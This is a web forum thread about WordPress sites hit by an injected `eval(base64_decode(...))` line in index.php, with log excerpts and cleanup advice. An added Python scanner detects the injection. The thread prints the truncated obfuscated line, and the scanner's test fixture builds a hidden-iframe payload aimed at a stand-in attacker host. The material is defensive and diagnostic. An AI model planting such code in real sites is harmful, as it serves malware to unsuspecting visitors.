Uh oh..host hacked?

So guys, I host about 10 websites on my hosting account. I haven't touched ANY of these websites in at least 2 months max, and I went to visit one today in Chrome and got this message:

“Warning: Something’s Not Right Here!
s*****.com contains content from asugzhivbf.co.tv, a site known to distribute malware. Your computer might catch a virus if you visit this site.”

I was confused…this is my website. So I quickly did what anyone would do, and tried visiting another one of my websites, which also gave me the same warning. AND another. I checked 4 out of the 10 and all gave the same warning.

So I’m wondering WHAT could have happened and what I should do from this point.

None of my websites had illegal content or stolen content. All unique, paid-for scripts, templates, etc.

Currently running a virus scan on my computer.

Use FTP to download the index page of one of those sites from your server, and then open it in your HTML editor to view the content (be very careful it doesn’t get opened in your browser!).

Perhaps some code has been added to the page? Or some evil hacker/ script kiddy has altered the code in it?

Immerse,

Thanks for the response!

All my sites use WordPress! So I downloaded via FTP the index.php for one website and opened it in Notepad++ (sandboxed).

On the FTP side, none of the files have upload dates more recent than a couple of months ago, when I last touched them.

But in the index.php this was all that was in it; I'm not sure if this is normal for a WordPress index.php:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFI.........FtZT48L2Rpdj4nOw0KfQ=='));
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

Again, I'm getting these errors on many of the websites I own, so whatever it is (or whoever) must know each website I own, which would lead me to think they know my host account login. But again, on the FTP side the last activity for anything was the last time I touched it, months ago.

Edit: I have the original WordPress theme I bought for the website whose index.php I posted above. I bought this theme from Themeforest. Since I have the theme saved to my documents, I checked its index.php. The original index.php goes like this:

<?php get_header(); ?>

	
<div id="slider-wrapper">
	<div id="slider-inner" class="container_24">
		
		<ul id="slider" class="grid_24 omega alpha">
		
		<?php
		$projects = kiss_projects(); // Default limit is 5
		$image_w = get_option(KISS.'_project_slthumb_w');
		$image_h = get_option(KISS.'_project_slthumb_h');
		$i=1;
		foreach( $projects as $project ) {
			
			$prodesc = get_post_meta($project["ID"], "_project_desc", true);
			$prodesc_type = get_post_meta($project["ID"], "_project_type", true);
			
			switch ($prodesc_type) {
			
				case "Default" : 
		
		?>
		
		  <li class="panel<?php echo $i ?>">
		   <div class="textSlide slideContent">
		    <a href="<?php echo get_permalink($project["ID"]) ?>"><?php get_image("post_ID=".$project["ID"]."&width=".$image_w."&height=".$image_h."&class=featureImage"); ?></a>
		    <div class="leftFeature grid_11">
			    <h2><a href="<?php echo get_permalink($project["ID"]) ?>"><?php echo $project["post_title"] ?></a></h2>
			    <p><?php echo $prodesc ?></p>
			    <div class="btn orange"><a href="<?php echo get_permalink($project["ID"]) ?>" title="View more"><span>View more</span></a></div>
		   </div>
		   </div>
		  </li>
		  
		<?php 
				break;
				case "Image" :
			
		?>
		
		  <li class="panel<?php echo $i ?>">
			<div class="imageSlide slideContent">
		 		<?php get_image("post_ID=".$project["ID"]."&width=948&height=247&class=featureImage"); ?>
		 		<a class="featureObg" href="<?php echo get_permalink($project["ID"]) ?>" title="<?php echo $project["post_title"] ?>"></a>
		 	</div>
		  </li>
		
		<?php			
				break;
			}
			
			$i++;
		
		} ?>
		  
		 </ul>
		
	</div>
</div>


<!-- BEGIN main_container_wrapper -->
<div id="main_container_wrapper"> 
  
  <!-- BEGIN main_container -->
  <div id="main_container" class="container_24"> 
  
  	<?php 
  	
  	if(get_option(KISS."_opt_homepage_style")=="bustyle") {
  		
  		include(TEMPLATEPATH . '/template-home-2.php');
  		
  	} else {
  	
  		include(TEMPLATEPATH . '/template-home-1.php');
  		
  	}
  	?>
    
    
  </div>
  <!-- BEGIN main_container -->
  <div class="clear"></div>
</div>
<!-- END main_container_wrapper -->

<?php get_footer(); ?>

Are all of the sites hosted on the same server or are the ones that have been hacked on a separate server?

Are they on a dedicated server or shared hosting?

SpacePhoenix,

They are all on the same host, on a plan with unlimited domains allowed. I've got about 10 domains on this one host, so I'm pretty sure it's all on the same server.

I'm not too sure what I'm looking for, but I was browsing some logs and whatnot in the Hostgator CP and saw a few "fishy"-looking things.

In the "error logs" section it listed these errors (some things ***'d out by me):

[Sun Aug 14 16:45:57 2011] [error] [client 67.195.110.173] (13)Permission denied: file permissions deny server access: /home/******/public_html/****.COM/.ftpquota
[Sun Aug 14 15:58:19 2011] [error] [client 124.115.1.66] File does not exist: /home/***********/public_html/game***/forums/jscripts/jscripts, referer: http://***.com/forums/showthread.php?tid=16359
[Sun Aug 14 15:58:18 2011] [error] [client 124.115.1.66] File does not exist: /home/************/public_html/game***/forums/jscripts/jscripts, referer: http://***.com/forums/showthread.php?tid=16359
[Sun Aug 14 15:50:53 2011] [error] [client 89.123.45.34] File does not exist: /home/*********/public_html/game***/forums/60;URL=online.php
[Sun Aug 14 15:50:09 2011] [error] [client 89.123.45.34] attempt to invoke directory as script: /home/*****/public_html/game***/cgi-bin/
[Sun Aug 14 15:50:08 2011] [error] [client 89.123.45.34] (13)Permission denied: file permissions deny server access: /home/******/public_html/game***/.ftpquota

Also, under visitors for one of the websites, I saw in the last 300 a bunch of visits to certain folders and directories of my theme by a user agent called "Java/1.6.0_04", all from an IP in Romania.

Not sure if any of this ^^ could mean something or if it's nothing.

Yeah, it's that first line. It writes an iframe which loads a page from some weird URL that wants to download some evil stuff onto your PC.

What to do now?

  1. change all your passwords related to your hosting (FTP, cPanel, MySQL etc).
  2. upload a fresh copy of index.php to each site or, even better, fresh WordPress installs (although that might take some work to get your sites working again with all plugins etc.). You can probably leave the databases in place, they generally don’t tend to get updated with this kind of attack.

Immerse,

Thanks I will go through and do that now with all the websites.

And out of curiosity, how does the "hacker" do something like this? Not looking for a play-by-play, but do they log into my FTP and download it, or inject it?

To be honest, I have no idea at all. Perhaps a vulnerability in WordPress? Perhaps they hacked a different account on the server? Maybe they brute-forced their way into your FTP account?

Maybe someone else has more knowledge about how this is done…

I just went ahead and wiped EVERYTHING. All subdirectories on the server, removed all MySQL databases, etc.

I haven't touched any of those websites in months. There are new versions of WP out too, which I noticed, so that might have been a big issue. A blank slate is better; at least I can redo everything with more security in mind.

Thanks for the help guys!

Off Topic:

This is not an accessibility / usability issue, so moved to the web security forum.

It is usually one of two:

  1. Stealing your FTP credentials (usually using a Trojan on your PC) and then uploading a new index.php
  2. Stealing/guessing your WP admin password and editing index.php

So two more suggestions:

  1. Scan your PC for viruses
  2. Change your WP admin password

Sometimes it might be one of your WP plugins that is vulnerable to injection attacks that allow modifying files. So make sure your WP and plugins are up to date with the most recent version.

Lots of other vectors:

  1. Used an insecurely configured plugin or an old version of WordPress to overwrite index.php
  2. Used a vulnerability in someone else’s site on the same server to overwrite your index.php

Once they’ve got one file in there, they are golden – they should be able to overwrite and update anything they want.

I had a similar attack on a shared hosting account, one that I'd done nothing with for a year or two. You should check index.php in subdirectories, and also check any .js files. In my case numerous files got the hack line added, not just the site index file. Using FTP, I spotted the other files by looking at the file modification date.
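A small scanner that automates the two checks from this thread: the `eval(base64_decode('...'))` line found at the top of index.php earlier, and the advice above to sweep subdirectories and .js files by modification date. This is an added example, not code from the thread; it decodes the base64 argument only for inspection (never executes it), and the sample tree it builds is a constructed fixture with a placeholder `attacker.invalid` host.

```python
import base64, os, re, tempfile, time
from pathlib import Path

# The injection shape seen in the thread: eval(base64_decode('...')) at the top of index.php.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
SCAN_SUFFIXES = {".php", ".js", ".html"}

def decode_payload(b64):
    """Decode the base64 argument for inspection only; it is never executed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", errors="replace")
    except ValueError as exc:
        return "<undecodable: %s>" % exc

def scan_tree(root, recent_days=30):
    """Return (relative path, reason, detail) tuples for injected or recently changed files."""
    root = Path(root)
    cutoff = time.time() - recent_days * 86400
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        rel = path.relative_to(root).as_posix()
        for match in EVAL_B64.finditer(path.read_text(errors="replace")):
            decoded = decode_payload(match.group(1))
            findings.append((rel, "eval(base64_decode)", decoded[:120]))
        if path.stat().st_mtime > cutoff:
            findings.append((rel, "modified in last %d days" % recent_days, ""))
    return findings

def build_sample_tree():
    """Constructed fixture: an injected index.php, an injected .js, and one old clean file."""
    root = Path(tempfile.mkdtemp())
    clean = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"
    # Constructed payload matching the thread's description: a hidden iframe to an attacker host.
    iframe = b"error_reporting(0); echo '<iframe src=\"http://attacker.invalid/\" width=0 height=0></iframe>';"
    payload = base64.b64encode(iframe).decode()
    (root / "index.php").write_text("<?php eval(base64_decode('%s'));\n" % payload + clean)
    (root / "wp-content").mkdir()
    (root / "wp-content" / "theme.js").write_text("eval(base64_decode('%s'));\n" % payload)
    old = root / "wp-content" / "clean.php"
    old.write_text(clean)
    year_ago = time.time() - 400 * 86400
    os.utime(old, (year_ago, year_ago))  # make the clean file look untouched for a year
    return root

if __name__ == "__main__":
    for rel, reason, detail in scan_tree(build_sample_tree()):
        print(rel, "|", reason, "|", detail)
```

Point `scan_tree` at a site's document root downloaded over FTP to get both the injected files and anything changed since you last worked on the site.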

Thanks for the replies guys. Sucks when it happens, but it's a good lesson. I'll definitely have a bigger emphasis on security in future websites and on my regular PC desktop.